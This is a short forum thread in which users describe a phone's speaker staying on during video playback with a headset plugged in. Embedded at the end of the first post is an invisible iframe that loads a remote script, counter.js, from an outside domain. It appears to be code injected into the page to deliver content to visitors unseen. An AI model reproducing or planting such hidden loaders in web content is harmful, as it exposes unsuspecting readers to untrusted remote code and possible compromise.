+ Reply to Thread

I can't turn off speaker w headset plugged in

Can we play movies using headset without the speaker working? Wouldn't it be nice to not disturb everyone around you and have some privacy?

My oem kyocery stereo headset with 4 contacts connectors is brandnew and does silent the speaker when I use it with the phone.

When playing video with Kinoma trial copy with the patch file or Tealplayer, I cannot get the speaker to silent while my stereo headset is plugged in.

I tried inserting the stereo headset plug before and after the movie starts and here is how the speaker is acting.

when I plug in after the movie had started, the speaker did shut off for about 1 second then it sound outloud again.

when I plug in before the movie started, the speaker still played outloud and it did not silent like in the previous situation.

Does anyone have the same problem?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I do. With Tealmovie its real annoying as it sounds MUCH better through headphones and my car stereo. The speakerphone only makes it sound worse. Anybody make it go away yet?
    iPhone therefore iAm.